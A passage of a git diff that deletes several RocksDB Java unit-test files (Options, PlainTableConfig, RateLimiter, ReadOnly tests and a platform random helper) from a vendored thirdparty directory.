-      final long longValue = rand.nextLong();
-      opt.setLogFileTimeToRoll(longValue);
-      assertThat(opt.logFileTimeToRoll()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void keepLogFileNum() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setKeepLogFileNum(longValue);
-      assertThat(opt.keepLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void recycleLogFileNum() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setRecycleLogFileNum(longValue);
-      assertThat(opt.recycleLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxManifestFileSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxManifestFileSize(longValue);
-      assertThat(opt.maxManifestFileSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void tableCacheNumshardbits() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setTableCacheNumshardbits(intValue);
-      assertThat(opt.tableCacheNumshardbits()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void walSizeLimitMB() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalSizeLimitMB(longValue);
-      assertThat(opt.walSizeLimitMB()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walTtlSeconds() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalTtlSeconds(longValue);
-      assertThat(opt.walTtlSeconds()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void manifestPreallocationSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setManifestPreallocationSize(longValue);
-      assertThat(opt.manifestPreallocationSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try(final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectReads(boolValue);
-      assertThat(opt.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectIoForFlushAndCompaction() {
-    try(final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectIoForFlushAndCompaction(boolValue);
-      assertThat(opt.useDirectIoForFlushAndCompaction()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFAllocate() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowFAllocate(boolValue);
-      assertThat(opt.allowFAllocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapReads() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapReads(boolValue);
-      assertThat(opt.allowMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapWrites() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapWrites(boolValue);
-      assertThat(opt.allowMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void isFdCloseOnExec() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setIsFdCloseOnExec(boolValue);
-      assertThat(opt.isFdCloseOnExec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void statsDumpPeriodSec() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setStatsDumpPeriodSec(intValue);
-      assertThat(opt.statsDumpPeriodSec()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void adviseRandomOnOpen() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAdviseRandomOnOpen(boolValue);
-      assertThat(opt.adviseRandomOnOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbWriteBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDbWriteBufferSize(longValue);
-      assertThat(opt.dbWriteBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void accessHintOnCompactionStart() {
-    try (final Options opt = new Options()) {
-      final AccessHint accessHint = AccessHint.SEQUENTIAL;
-      opt.setAccessHintOnCompactionStart(accessHint);
-      assertThat(opt.accessHintOnCompactionStart()).isEqualTo(accessHint);
-    }
-  }
-
-  @Test
-  public void newTableReaderForCompactionInputs() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setNewTableReaderForCompactionInputs(boolValue);
-      assertThat(opt.newTableReaderForCompactionInputs()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setCompactionReadaheadSize(longValue);
-      assertThat(opt.compactionReadaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setRandomAccessMaxBufferSize(longValue);
-      assertThat(opt.randomAccessMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWritableFileMaxBufferSize(longValue);
-      assertThat(opt.writableFileMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useAdaptiveMutex() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseAdaptiveMutex(boolValue);
-      assertThat(opt.useAdaptiveMutex()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setBytesPerSync(longValue);
-      assertThat(opt.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walBytesPerSync() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalBytesPerSync(longValue);
-      assertThat(opt.walBytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void enableThreadTracking() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableThreadTracking(boolValue);
-      assertThat(opt.enableThreadTracking()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void delayedWriteRate() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDelayedWriteRate(longValue);
-      assertThat(opt.delayedWriteRate()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void allowConcurrentMemtableWrite() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowConcurrentMemtableWrite(boolValue);
-      assertThat(opt.allowConcurrentMemtableWrite()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void enableWriteThreadAdaptiveYield() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableWriteThreadAdaptiveYield(boolValue);
-      assertThat(opt.enableWriteThreadAdaptiveYield()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void writeThreadMaxYieldUsec() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadMaxYieldUsec(longValue);
-      assertThat(opt.writeThreadMaxYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writeThreadSlowYieldUsec() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadSlowYieldUsec(longValue);
-      assertThat(opt.writeThreadSlowYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void skipStatsUpdateOnDbOpen() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setSkipStatsUpdateOnDbOpen(boolValue);
-      assertThat(opt.skipStatsUpdateOnDbOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void walRecoveryMode() {
-    try (final Options opt = new Options()) {
-      for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-        opt.setWalRecoveryMode(walRecoveryMode);
-        assertThat(opt.walRecoveryMode()).isEqualTo(walRecoveryMode);
-      }
-    }
-  }
-
-  @Test
-  public void allow2pc() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllow2pc(boolValue);
-      assertThat(opt.allow2pc()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rowCache() {
-    try (final Options opt = new Options()) {
-      assertThat(opt.rowCache()).isNull();
-
-      try(final Cache lruCache = new LRUCache(1000)) {
-        opt.setRowCache(lruCache);
-        assertThat(opt.rowCache()).isEqualTo(lruCache);
-      }
-
-      try(final Cache clockCache = new ClockCache(1000)) {
-        opt.setRowCache(clockCache);
-        assertThat(opt.rowCache()).isEqualTo(clockCache);
-      }
-    }
-  }
-
-  @Test
-  public void failIfOptionsFileError() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFailIfOptionsFileError(boolValue);
-      assertThat(opt.failIfOptionsFileError()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dumpMallocStats() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDumpMallocStats(boolValue);
-      assertThat(opt.dumpMallocStats()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringRecovery() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringRecovery(boolValue);
-      assertThat(opt.avoidFlushDuringRecovery()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringShutdown() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringShutdown(boolValue);
-      assertThat(opt.avoidFlushDuringShutdown()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final Options options = new Options();
-         final Env env = Env.getDefault()) {
-      options.setEnv(env);
-      assertThat(options.getEnv()).isSameAs(env);
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final Options options = new Options()) {
-      options.optimizeUniversalStyleCompaction();
-      options.optimizeUniversalStyleCompaction(4000);
-      options.optimizeLevelStyleCompaction();
-      options.optimizeLevelStyleCompaction(3000);
-      options.optimizeForPointLookup(10);
-      options.optimizeForSmallDb();
-      options.prepareForBulkLoad();
-    }
-  }
-
-  @Test
-  public void compressionTypes() {
-    try (final Options options = new Options()) {
-      for (final CompressionType compressionType :
-          CompressionType.values()) {
-        options.setCompressionType(compressionType);
-        assertThat(options.compressionType()).
-            isEqualTo(compressionType);
-        assertThat(CompressionType.valueOf("NO_COMPRESSION")).
-            isEqualTo(CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void compressionPerLevel() {
-    try (final Options options = new Options()) {
-      assertThat(options.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList =
-          new ArrayList<>();
-      for (int i = 0; i < options.numLevels(); i++) {
-        compressionTypeList.add(CompressionType.NO_COMPRESSION);
-      }
-      options.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = options.compressionPerLevel();
-      for (final CompressionType compressionType : compressionTypeList) {
-        assertThat(compressionType).isEqualTo(
-            CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void differentCompressionsPerLevel() {
-    try (final Options options = new Options()) {
-      options.setNumLevels(3);
-
-      assertThat(options.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-
-      compressionTypeList.add(CompressionType.BZLIB2_COMPRESSION);
-      compressionTypeList.add(CompressionType.SNAPPY_COMPRESSION);
-      compressionTypeList.add(CompressionType.LZ4_COMPRESSION);
-
-      options.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = options.compressionPerLevel();
-
-      assertThat(compressionTypeList.size()).isEqualTo(3);
-      assertThat(compressionTypeList).
-          containsExactly(
-              CompressionType.BZLIB2_COMPRESSION,
-              CompressionType.SNAPPY_COMPRESSION,
-              CompressionType.LZ4_COMPRESSION);
-
-    }
-  }
-
-  @Test
-  public void bottommostCompressionType() {
-    try (final Options options = new Options()) {
-      assertThat(options.bottommostCompressionType())
-          .isEqualTo(CompressionType.DISABLE_COMPRESSION_OPTION);
-
-      for (final CompressionType compressionType : CompressionType.values()) {
-        options.setBottommostCompressionType(compressionType);
-        assertThat(options.bottommostCompressionType())
-            .isEqualTo(compressionType);
-      }
-    }
-  }
-
-  @Test
-  public void compressionOptions() {
-    try (final Options options = new Options();
-         final CompressionOptions compressionOptions = new CompressionOptions()
-             .setMaxDictBytes(123)) {
-
-      options.setCompressionOptions(compressionOptions);
-      assertThat(options.compressionOptions())
-          .isEqualTo(compressionOptions);
-      assertThat(options.compressionOptions().maxDictBytes())
-          .isEqualTo(123);
-    }
-  }
-
-  @Test
-  public void compactionStyles() {
-    try (final Options options = new Options()) {
-      for (final CompactionStyle compactionStyle :
-          CompactionStyle.values()) {
-        options.setCompactionStyle(compactionStyle);
-        assertThat(options.compactionStyle()).
-            isEqualTo(compactionStyle);
-        assertThat(CompactionStyle.valueOf("FIFO")).
-            isEqualTo(CompactionStyle.FIFO);
-      }
-    }
-  }
-
-  @Test
-  public void maxTableFilesSizeFIFO() {
-    try (final Options opt = new Options()) {
-      long longValue = rand.nextLong();
-      // Size has to be positive
-      longValue = (longValue < 0) ? -longValue : longValue;
-      longValue = (longValue == 0) ? longValue + 1 : longValue;
-      opt.setMaxTableFilesSizeFIFO(longValue);
-      assertThat(opt.maxTableFilesSizeFIFO()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try (final Options options = new Options();
-         final Options anotherOptions = new Options();
-         final RateLimiter rateLimiter =
-             new RateLimiter(1000, 100 * 1000, 1)) {
-      options.setRateLimiter(rateLimiter);
-      // Test with parameter initialization
-      anotherOptions.setRateLimiter(
-          new RateLimiter(1000));
-    }
-  }
-
-  @Test
-  public void shouldSetTestPrefixExtractor() {
-    try (final Options options = new Options()) {
-      options.useFixedLengthPrefixExtractor(100);
-      options.useFixedLengthPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldSetTestCappedPrefixExtractor() {
-    try (final Options options = new Options()) {
-      options.useCappedPrefixExtractor(100);
-      options.useCappedPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldTestMemTableFactoryName()
-      throws RocksDBException {
-    try (final Options options = new Options()) {
-      options.setMemTableConfig(new VectorMemTableConfig());
-      assertThat(options.memTableFactoryName()).
-          isEqualTo("VectorRepFactory");
-      options.setMemTableConfig(
-          new HashLinkedListMemTableConfig());
-      assertThat(options.memTableFactoryName()).
-          isEqualTo("HashLinkedListRepFactory");
-    }
-  }
-
-  @Test
-  public void statistics() {
-    try(final Options options = new Options()) {
-      final Statistics statistics = options.statistics();
-      assertThat(statistics).isNull();
-    }
-
-    try(final Statistics statistics = new Statistics();
-        final Options options = new Options().setStatistics(statistics);
-        final Statistics stats = options.statistics()) {
-      assertThat(stats).isNotNull();
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumberToMaintain() {
-    try (final Options options = new Options()) {
-      int intValue = rand.nextInt();
-      // Size has to be positive
-      intValue = (intValue < 0) ? -intValue : intValue;
-      intValue = (intValue == 0) ? intValue + 1 : intValue;
-      options.setMaxWriteBufferNumberToMaintain(intValue);
-      assertThat(options.maxWriteBufferNumberToMaintain()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void compactionPriorities() {
-    try (final Options options = new Options()) {
-      for (final CompactionPriority compactionPriority :
-          CompactionPriority.values()) {
-        options.setCompactionPriority(compactionPriority);
-        assertThat(options.compactionPriority()).
-            isEqualTo(compactionPriority);
-      }
-    }
-  }
-
-  @Test
-  public void reportBgIoStats() {
-    try (final Options options = new Options()) {
-      final boolean booleanValue = true;
-      options.setReportBgIoStats(booleanValue);
-      assertThat(options.reportBgIoStats()).
-          isEqualTo(booleanValue);
-    }
-  }
-
-  @Test
-  public void compactionOptionsUniversal() {
-    try (final Options options = new Options();
-         final CompactionOptionsUniversal optUni = new CompactionOptionsUniversal()
-             .setCompressionSizePercent(7)) {
-      options.setCompactionOptionsUniversal(optUni);
-      assertThat(options.compactionOptionsUniversal()).
-          isEqualTo(optUni);
-      assertThat(options.compactionOptionsUniversal().compressionSizePercent())
-          .isEqualTo(7);
-    }
-  }
-
-  @Test
-  public void compactionOptionsFIFO() {
-    try (final Options options = new Options();
-         final CompactionOptionsFIFO optFifo = new CompactionOptionsFIFO()
-             .setMaxTableFilesSize(2000)) {
-      options.setCompactionOptionsFIFO(optFifo);
-      assertThat(options.compactionOptionsFIFO()).
-          isEqualTo(optFifo);
-      assertThat(options.compactionOptionsFIFO().maxTableFilesSize())
-          .isEqualTo(2000);
-    }
-  }
-
-  @Test
-  public void forceConsistencyChecks() {
-    try (final Options options = new Options()) {
-      final boolean booleanValue = true;
-      options.setForceConsistencyChecks(booleanValue);
-      assertThat(options.forceConsistencyChecks()).
-          isEqualTo(booleanValue);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
deleted file mode 100644
index dcb6cc3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class PlainTableConfigTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void keySize() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setKeySize(5);
-    assertThat(plainTableConfig.keySize()).
-        isEqualTo(5);
-  }
-
-  @Test
-  public void bloomBitsPerKey() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setBloomBitsPerKey(11);
-    assertThat(plainTableConfig.bloomBitsPerKey()).
-        isEqualTo(11);
-  }
-
-  @Test
-  public void hashTableRatio() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setHashTableRatio(0.95);
-    assertThat(plainTableConfig.hashTableRatio()).
-        isEqualTo(0.95);
-  }
-
-  @Test
-  public void indexSparseness() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setIndexSparseness(18);
-    assertThat(plainTableConfig.indexSparseness()).
-        isEqualTo(18);
-  }
-
-  @Test
-  public void hugePageTlbSize() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setHugePageTlbSize(1);
-    assertThat(plainTableConfig.hugePageTlbSize()).
-        isEqualTo(1);
-  }
-
-  @Test
-  public void encodingType() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setEncodingType(EncodingType.kPrefix);
-    assertThat(plainTableConfig.encodingType()).isEqualTo(
-        EncodingType.kPrefix);
-  }
-
-  @Test
-  public void fullScanMode() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setFullScanMode(true);
-    assertThat(plainTableConfig.fullScanMode()).isTrue();  }
-
-  @Test
-  public void storeIndexInFile() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setStoreIndexInFile(true);
-    assertThat(plainTableConfig.storeIndexInFile()).
-        isTrue();
-  }
-
-  @Test
-  public void plainTableConfig() {
-    try(final Options opt = new Options()) {
-      final PlainTableConfig plainTableConfig = new PlainTableConfig();
-      opt.setTableFormatConfig(plainTableConfig);
-      assertThat(opt.tableFactoryName()).isEqualTo("PlainTable");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
deleted file mode 100644
index 80ea4d1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
+++ /dev/null
@@ -1,58 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Random;
-
-/**
- * Helper class to get the appropriate Random class instance dependent
- * on the current platform architecture (32bit vs 64bit)
- */
-public class PlatformRandomHelper {
-    /**
-     * Determine if OS is 32-Bit/64-Bit
-     *
-     * @return boolean value indicating if operating system is 64 Bit.
-     */
-    public static boolean isOs64Bit(){
-      final boolean is64Bit;
-      if (System.getProperty("os.name").contains("Windows")) {
-        is64Bit = (System.getenv("ProgramFiles(x86)") != null);
-      } else {
-        is64Bit = (System.getProperty("os.arch").contains("64"));
-      }
-      return is64Bit;
-    }
-
-    /**
-     * Factory to get a platform specific Random instance
-     *
-     * @return {@link java.util.Random} instance.
-     */
-    public static Random getPlatformSpecificRandomFactory(){
-      if (isOs64Bit()) {
-        return new Random();
-      }
-      return new Random32Bit();
-    }
-
-    /**
-     * Random32Bit is a class which overrides {@code nextLong} to
-     * provide random numbers which fit in size_t. This workaround
-     * is necessary because there is no unsigned_int &lt; Java 8
-     */
-    private static class Random32Bit extends Random {
-      @Override
-      public long nextLong(){
-      return this.nextInt(Integer.MAX_VALUE);
-    }
-    }
-
-    /**
-     * Utility class constructor
-     */
-    private PlatformRandomHelper() { }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java
deleted file mode 100644
index 27567e8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RateLimiterTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void setBytesPerSecond() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      rateLimiter.setBytesPerSecond(2000);
-    }
-  }
-
-  @Test
-  public void getSingleBurstBytes() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getSingleBurstBytes()).isEqualTo(100);
-    }
-  }
-
-  @Test
-  public void getTotalBytesThrough() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getTotalBytesThrough()).isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void getTotalRequests() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getTotalRequests()).isEqualTo(0);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java
deleted file mode 100644
index 6b4c7b2..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java
+++ /dev/null
@@ -1,305 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ReadOnlyTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void readOnlyOpen() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      try (final RocksDB db2 = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath())) {
-        assertThat("value").
-            isEqualTo(new String(db2.get("key".getBytes())));
-      }
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = new ArrayList<>();
-      cfDescriptors.add(new ColumnFamilyDescriptor(
-          RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts));
-
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath(),
-          cfDescriptors, columnFamilyHandleList)) {
-        try (final ColumnFamilyOptions newCfOpts = new ColumnFamilyOptions();
-             final ColumnFamilyOptions newCf2Opts = new ColumnFamilyOptions()
-        ) {
-          columnFamilyHandleList.add(db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf".getBytes(), newCfOpts)));
-          columnFamilyHandleList.add(db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf2".getBytes(), newCf2Opts)));
-          db.put(columnFamilyHandleList.get(2), "key2".getBytes(),
-              "value2".getBytes());
-
-          final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-              new ArrayList<>();
-          try (final RocksDB db2 = RocksDB.openReadOnly(
-              dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-              readOnlyColumnFamilyHandleList)) {
-            try (final ColumnFamilyOptions newCfOpts2 =
-                     new ColumnFamilyOptions();
-                 final ColumnFamilyOptions newCf2Opts2 =
-                     new ColumnFamilyOptions()
-            ) {
-              assertThat(db2.get("key2".getBytes())).isNull();
-              assertThat(db2.get(readOnlyColumnFamilyHandleList.get(0),
-                  "key2".getBytes())).
-                  isNull();
-              cfDescriptors.clear();
-              cfDescriptors.add(
-                  new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY,
-                      newCfOpts2));
-              cfDescriptors.add(new ColumnFamilyDescriptor("new_cf2".getBytes(),
-                      newCf2Opts2));
-
-              final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList2
-                  = new ArrayList<>();
-              try (final RocksDB db3 = RocksDB.openReadOnly(
-                  dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-                  readOnlyColumnFamilyHandleList2)) {
-                try {
-                  assertThat(new String(db3.get(
-                      readOnlyColumnFamilyHandleList2.get(1),
-                      "key2".getBytes()))).isEqualTo("value2");
-                } finally {
-                  for (final ColumnFamilyHandle columnFamilyHandle :
-                      readOnlyColumnFamilyHandleList2) {
-                    columnFamilyHandle.close();
-                  }
-                }
-              }
-            } finally {
-              for (final ColumnFamilyHandle columnFamilyHandle :
-                  readOnlyColumnFamilyHandleList) {
-                columnFamilyHandle.close();
-              }
-            }
-          }
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToWriteInReadOnly() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          // test that put fails in readonly mode
-          rDb.put("key".getBytes(), "value".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToCFWriteInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
